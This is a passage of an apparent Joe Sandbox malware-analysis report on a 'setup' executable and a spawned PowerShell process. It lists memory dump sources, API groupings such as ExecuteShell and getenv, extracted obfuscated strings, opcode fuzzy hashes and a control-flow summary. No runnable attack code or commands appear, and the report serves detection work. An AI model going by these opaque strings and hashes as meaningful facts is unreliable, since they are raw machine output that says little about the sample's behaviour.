                                      • Associated: 00000000.00000002.1776419175.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000001802000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1780689929.0000000002113000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                                      Similarity
                                      • API ID: ExecuteShellmemset$_sleepfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                      • String ID: ! @$%s\%s$& @$+I$0I$1 @$;I$`!@$e!@$q!@
                                      • API String ID: 1922354721-1880397412

                                      Control-flow Graph

                                      control_flow_graph 28 401000-40102e malloc 29 401031-401039 28->29 30 401087-40108b 29->30 31 40103f-401085 29->31 31->29
                                      APIs
                                      Strings
                                      • ,82j6jrg@l(]6w7qb&[md/9t!+4c!4(4, xrefs: 0040106E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1776377178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1776240472.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000001802000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1780689929.0000000002113000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: ,82j6jrg@l(]6w7qb&[md/9t!+4c!4(4
                                      • API String ID: 2803490479-3771425235

                                      Control-flow Graph

                                      control_flow_graph 34 40149f-4014f2 call 4013f8 call 40108c call 401454
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1776377178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1776240472.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000001802000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1780689929.0000000002113000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                                      Similarity
                                      • API ID: memset$ExecuteShell_sleep
                                      • String ID:
                                      • API String ID: 3960281847-0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Zm^
                                      • API String ID: 0-2396149090
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Zm^
                                      • API String ID: 0-2396149090
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'dq$4'dq$4'dq$4'dq$J*l$J*l$J*l$J*l$J*l$J*l$r)l$r)l
                                      • API String ID: 0-262702356
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'dq$4'dq$4'dq$4'dq
                                      • API String ID: 0-2296240322
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (hq
                                      • API String ID: 0-4060669308
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]m^
                                      • API String ID: 0-2480367066
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (&dq
                                      • API String ID: 0-1586597270
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ]m^
                                      • API String ID: 0-2480367066
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40b92f9289e283d8b8eb38a794ea0c5b083143a96b13e1ad81b2ae3d9e14414d
                                      • Instruction ID: 7e2293030acd7f1a49727fdc92613710698db4ee48188341e05948ff02b069b5
                                      • Opcode Fuzzy Hash: 40b92f9289e283d8b8eb38a794ea0c5b083143a96b13e1ad81b2ae3d9e14414d
                                      • Instruction Fuzzy Hash: F9B13AB2F0424D9FCB508F6DC81866EBBE2AF96321F18C06AD945CB291DB31D945C7E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86be3ab6a6f1a9b8b36421e133661a1dac416e57d5b78ccb2d5fbcf44cf0e3ea
                                      • Instruction ID: fdae960c61e3c6e4f4ab02218360b509f40a30257fd3cb146df68e585f3eb200
                                      • Opcode Fuzzy Hash: 86be3ab6a6f1a9b8b36421e133661a1dac416e57d5b78ccb2d5fbcf44cf0e3ea
                                      • Instruction Fuzzy Hash: B5916B74A002058FCB15CF9CC4949AEFBB2FF88310B2485A9D915AB3A5C735FD91CBA0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 18713211a3f9f23955150bdeacdb82c1453f338ad9975ba1d913040ec47028f9
                                      • Instruction ID: f5ff376ae5fc260dc742d0818b0bc699064974169e70f82f80ec4ef274eeea4a
                                      • Opcode Fuzzy Hash: 18713211a3f9f23955150bdeacdb82c1453f338ad9975ba1d913040ec47028f9
                                      • Instruction Fuzzy Hash: A3611771E002489FCB14DFA9D584B8DFBF2EF88310F25816AE809AB354EB70AD45CB50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7c3b64b0fe1b42a2fe6bb06d1baff62946f4e27fe899f68a08a07cb17373a5b1
                                      • Instruction ID: f86903b8bf5a4560dd195ba74fe045985f7f938ddb4eaef5db0b8006d85b640e
                                      • Opcode Fuzzy Hash: 7c3b64b0fe1b42a2fe6bb06d1baff62946f4e27fe899f68a08a07cb17373a5b1
                                      • Instruction Fuzzy Hash: 5C51AC347002169FDB049B79D854A6A7BE7FFC8354F2484A9E60ADB355EB35EC01CBA0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c6a3e053be41a9875ff54654c650201a6bdf5e120d7dafdb87099562edc721e
                                      • Instruction ID: 68790e4cbb46cd4cbcc2a8d5dfea920e5fd1c3fb0a0154efe0e5501135f37fbc
                                      • Opcode Fuzzy Hash: 0c6a3e053be41a9875ff54654c650201a6bdf5e120d7dafdb87099562edc721e
                                      • Instruction Fuzzy Hash: CE510971E002489FCB54DFA9D585A8DFBF2FF88310F15816AE819AB364EB30AD45CB50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 480184968ff975dfb61fdfc1673b3758e63428eb7e3419a9f36dd96ff2d604b7
                                      • Instruction ID: 4989d7db5bfff7229ca3f7681f1ea70db75634e6a53dd544b988c78355ef7e87
                                      • Opcode Fuzzy Hash: 480184968ff975dfb61fdfc1673b3758e63428eb7e3419a9f36dd96ff2d604b7
                                      • Instruction Fuzzy Hash: 6A419234A052468FCB05CFA9C8549A9BBF2EF8A315F19449DE405EB3A1DB31ED41CF60
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: acdc00023c0e7aa1a4fefe25ac7a26a599f7f7fd766ac054eddff4d08e155df0
                                      • Instruction ID: 761749a6a6e3414f7d25bb3a237a738565465959039fe416c79edfd6bd2ee990
                                      • Opcode Fuzzy Hash: acdc00023c0e7aa1a4fefe25ac7a26a599f7f7fd766ac054eddff4d08e155df0
                                      • Instruction Fuzzy Hash: 37414CB4A005059FCB06CF58C4D89AEFBB2FF48310B2585A9D915AB365C736FD91CBA0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1826959644.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_7800000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04d39a8d215a03366e6d16ae97263be711e850c9b90c4d4b21fb4e99d3422a73
                                      • Instruction ID: 77cf04ed5b707ea46627721bf239c3e85a3a97687de0ad73f0f92580fb80ae1e
                                      • Opcode Fuzzy Hash: 04d39a8d215a03366e6d16ae97263be711e850c9b90c4d4b21fb4e99d3422a73
                                      • Instruction Fuzzy Hash: DA31D1F1A00206EBCBA08E29CD0567BBBB2AFA0648F14816DDD04DBAD5D731EC44C7E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0575a2b621c121bf3f07bebb8ae5dcaba7e78835bbe5d81a29fb67b975877296
                                      • Instruction ID: 5c719b583226fc8a8c5a532b5534abb93446ff21a90e1b5321fd7b6df60ed1b4
                                      • Opcode Fuzzy Hash: 0575a2b621c121bf3f07bebb8ae5dcaba7e78835bbe5d81a29fb67b975877296
                                      • Instruction Fuzzy Hash: A231AB313006118FD705DB29E840BAABBA7EFD4356F108669E60ACB355DF70A8458BA0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ecc716b91cb754be1cbee0d70d5889f48534ee60bff757bae672556648670c90
                                      • Instruction ID: eb16ce713b2464a1a15ba99aa1a739f6fa15376e84071b940ca3c8be629b13b7
                                      • Opcode Fuzzy Hash: ecc716b91cb754be1cbee0d70d5889f48534ee60bff757bae672556648670c90
                                      • Instruction Fuzzy Hash: 45316AB0A002099FDB04DFB9D494BAEBBF7AF88304F14806DE515EB350EB75AC418B50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31c3ba4a10e4b73826a732be7990d6f276be5baa3734eeb6a2cfc16afee6077b
                                      • Instruction ID: 06ec001ad48cef765318161309dd95decf6da36e79e386207ea4fda1be6b7645
                                      • Opcode Fuzzy Hash: 31c3ba4a10e4b73826a732be7990d6f276be5baa3734eeb6a2cfc16afee6077b
                                      • Instruction Fuzzy Hash: A5314AB0A002099FDB04DFA9D494BAEBAF7EF88340F14806DE515EB350EB75AC018B64
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 10073ba6d13641ebe000323ab346a83c81fa9709d45fef9573c8e9769684f6cb
                                      • Instruction ID: 57e0a99a08d4104b9eee7afaf5c3eb18a50945261a0c38e63371b43fddca9d86
                                      • Opcode Fuzzy Hash: 10073ba6d13641ebe000323ab346a83c81fa9709d45fef9573c8e9769684f6cb
                                      • Instruction Fuzzy Hash: C9312574A002048FCB14DF68D458AAEBBF2BF89324F14856DD406EB3A1DB70AD85CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d2c05292ff503667620306020f764360ade826454b92e85337015fc1dc079916
                                      • Instruction ID: face2947667826b4be9c92f08b9e933bd56d21089281a93a0207ed054af78e6f
                                      • Opcode Fuzzy Hash: d2c05292ff503667620306020f764360ade826454b92e85337015fc1dc079916
                                      • Instruction Fuzzy Hash: 24310474A002088FCB14DF68D858AAEBBF6BF89714F14856DD406EB3A1DF71AD45CB90
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4985b895ab76bd4809c4df45aa8cbaf4a0007278c5840a111d4a7cdf3321515b
                                      • Instruction ID: b6f0f083550ce63e2e9f953f1489364150c82516cc2a8f82424ad26457ae49ec
                                      • Opcode Fuzzy Hash: 4985b895ab76bd4809c4df45aa8cbaf4a0007278c5840a111d4a7cdf3321515b
                                      • Instruction Fuzzy Hash: ED210776600200DFDB05CF14DAC0B16BF65FB88314F64C699DA0D0A666CB7AD456CB61
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22d94859a7b1fccdce508d5f0600a1a63a398381524ead6dcc0653a111905c12
                                      • Instruction ID: 00c035b2de6595e6ffe34048addefdf249f5a562d3df43a68899aacf41ea3bc6
                                      • Opcode Fuzzy Hash: 22d94859a7b1fccdce508d5f0600a1a63a398381524ead6dcc0653a111905c12
                                      • Instruction Fuzzy Hash: 00318EB09053848EDB60CF6AD18879AFFF2EF88320F28C15DD45E97256D674A485CB61
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e9756ab0a28382bfe41ce6fde9ed556fd96ffc36f55d7890c25a7e18dd95fd4
                                      • Instruction ID: f7e7b8e9b6ba0ea0de2dce5d92138c6b36216f667d5ed698dc7639b3c08308ab
                                      • Opcode Fuzzy Hash: 7e9756ab0a28382bfe41ce6fde9ed556fd96ffc36f55d7890c25a7e18dd95fd4
                                      • Instruction Fuzzy Hash: 7B214572A04200DFDB10CF18C8C0B12BFA1EB94724F20CA6DDA0E0B642CBB6E406CA61
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3d85438eb2b4d8e5bdff9817d12aa78485e3448f7e1a16e49329859899e3aaf3
                                      • Instruction ID: 5d7f6754b13acb1c4b464fb8e6b20dce73f5026c6d5a8676833fc68fd1d07155
                                      • Opcode Fuzzy Hash: 3d85438eb2b4d8e5bdff9817d12aa78485e3448f7e1a16e49329859899e3aaf3
                                      • Instruction Fuzzy Hash: E4217AB09057448EDB60CF6AD48878AFFF6EF88320F28C05ED85E97255DB74A481CB64
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b57d358dc103aa38a79d96ef440cc505d1c7bf43d302da5066be516a2e57bc48
                                      • Instruction ID: d958d49c741b343a7a4f6d614dbd365edf6ad7063c0c0d68723464a4f89abe89
                                      • Opcode Fuzzy Hash: b57d358dc103aa38a79d96ef440cc505d1c7bf43d302da5066be516a2e57bc48
                                      • Instruction Fuzzy Hash: 22112E797001198FCB04DBA8D840A9D77F6EFCC761B1440A8E509DB355DB34ED018B91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                      • Instruction ID: 2ce17107e5ef101ede494d1249aae173145a467adc5dfb542840c071215446b6
                                      • Opcode Fuzzy Hash: a89199e71a2f2f2a9adf406ea1041e5b746e28aab0e6237c120dfcb4fbddfc9c
                                      • Instruction Fuzzy Hash: DB219D76904240DFCF06CF10DAC4B16BF72FB88314F24C6A9D9494A666C73AD46ACB91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                      • Instruction ID: 5fa01b21c3fba83cd3db4cda74d5550eb23ac1e98d523d157be42e25d71c94ca
                                      • Opcode Fuzzy Hash: 68800c76144ede0aa7da6335da1dd53af556f69f25deb7cd9fee3e0448842dc9
                                      • Instruction Fuzzy Hash: 3C11BE75904280CFDB15CF14D5C4B15BF61FB84324F24C6A9D90E4BA56C37AE44ACB61
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf6d023574406e597acb02b657f7da1864520be71dda8f4a1f177b23c937ca2e
                                      • Instruction ID: fa61278b5bc2e4c048335d3e0a6c73de47c151ddba0b9cb086cfe1d6bd77bcd1
                                      • Opcode Fuzzy Hash: cf6d023574406e597acb02b657f7da1864520be71dda8f4a1f177b23c937ca2e
                                      • Instruction Fuzzy Hash: EB01D2316087849FD715CBB9D994A5A7FF1EF45210F1848EEE08ACB6A3DA20FC45C701
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a344c3ce2b6dfb13820454bdcd0f595fecf70399eac398384a12298ff4732e3e
                                      • Instruction ID: 3fb27c81ebb54f5562cca9cfded2f4847474be3762fcab7b8c14ceae19bd7019
                                      • Opcode Fuzzy Hash: a344c3ce2b6dfb13820454bdcd0f595fecf70399eac398384a12298ff4732e3e
                                      • Instruction Fuzzy Hash: 2A110535204750CFC728DF79D08086ABBF6EF8931536489ADD48A8B7A0DB36F946CB50
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 334097652c5171b017bee7a917a8817330fe43b7f79e23a2a5b18786a16e5277
                                      • Instruction ID: 7330ef10bf2b04c931b1a58d85c182bf6c6ea371762e4e89ea9b05b07abc3aef
                                      • Opcode Fuzzy Hash: 334097652c5171b017bee7a917a8817330fe43b7f79e23a2a5b18786a16e5277
                                      • Instruction Fuzzy Hash: 960152357012189FCF119F74E808AAEBBF6FB89315F1440ADE51AD3242DB319911CB91
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: af9e5f3b3e76c3da6fdad9222203badff063c43f468bd504e3c7953f0f9c51bc
                                      • Instruction ID: 0253ef5b0deb578589f6bd94325cdd03a78bfd29eee73691837423bfdaa19dd4
                                      • Opcode Fuzzy Hash: af9e5f3b3e76c3da6fdad9222203badff063c43f468bd504e3c7953f0f9c51bc
                                      • Instruction Fuzzy Hash: 93012B725043409AE7104B2DDCC4B67FFD8DF517A5F08C41AEE080B28ACBB9A841C7B1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1764020719.0000000002F4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F4D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2f4d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fff38a49ce99e795c4fb7e2106182d4a60ffa912caf6a84272bd819e5ea3b756
                                      • Instruction ID: 4e697d2da6f866410fffa8cc7c21130794873377359cc520650d626797d37ea3
                                      • Opcode Fuzzy Hash: fff38a49ce99e795c4fb7e2106182d4a60ffa912caf6a84272bd819e5ea3b756
                                      • Instruction Fuzzy Hash: 1701527140E3C05ED7128B258C94B52BFB4DF53624F1DC1DBE9888F1A7C6695845C7B2
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f03f794d41922ca69dc66d3a3014d565d8a00d7241fb2c519f771ad9daee4721
                                      • Instruction ID: 657887ed06e7041fee1ea7631ddddb763b49c91cd3315715076dcfd4d8780160
                                      • Opcode Fuzzy Hash: f03f794d41922ca69dc66d3a3014d565d8a00d7241fb2c519f771ad9daee4721
                                      • Instruction Fuzzy Hash: E5F0AF323093A01FD7118ABA9C5096B7FE9EF8662070945BAF594CB3A3C660CC04C7A0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f6d079bfc37fc2d73a09c9b2ad74d56fe129ff160381bae720ab65f9b00cede
                                      • Instruction ID: 8710f760107d57365c80c96562f32ca700666049b24d2f4367b8f2b1dffd5588
                                      • Opcode Fuzzy Hash: 0f6d079bfc37fc2d73a09c9b2ad74d56fe129ff160381bae720ab65f9b00cede
                                      • Instruction Fuzzy Hash: A101D771D1074AAADF40CFE4C9446EEBBB1FF9A304F24471EE045A6641EBB06686CB81
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e0412dcfbeaec3c3ea997600c081c2c35335da2df71da465afc9cd4d789d6531
                                      • Instruction ID: 883d981da39d5dac82f7f41ad3ba79bded9a1cc5e7042e6f609cb80a47dc6457
                                      • Opcode Fuzzy Hash: e0412dcfbeaec3c3ea997600c081c2c35335da2df71da465afc9cd4d789d6531
                                      • Instruction Fuzzy Hash: 31F0BE323082641FD7008AAA9C44DBBBFEDEFC9620B04407AF958C3351CAB1CD0086A0
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1768913009.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4cc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fe30bda5811ca802f8a74befa09fef0cfff04db1ecbefb72727b06916d849ca6
                                      • Instruction ID: c633547c01c4ace8693e8fab8d3c12a5831530ad41b7428b073d3730165d4673
                                      • Opcode Fuzzy Hash: fe30bda5811ca802f8a74befa09fef0cfff04db1ecbefb72727b06916d849ca6
                                      • Instruction Fuzzy Hash: B2F0C2716082645FD301AB24D4183AB7FB6DFC6359F24819ED6058B396DE392C06CBA1
                                      Memory Dump Source
